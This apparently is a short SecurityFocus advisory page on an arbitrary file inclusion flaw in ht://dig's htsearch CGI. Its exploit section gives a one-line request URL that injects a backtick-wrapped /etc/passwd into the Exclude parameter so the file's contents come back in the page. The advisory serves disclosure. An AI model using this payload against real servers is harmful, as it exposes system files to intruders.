info
discussion
exploit
solution
references
ht://dig Arbitrary File Inclusion Vulnerability
The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.
Privacy Statement
Copyright 2010, SecurityFocus
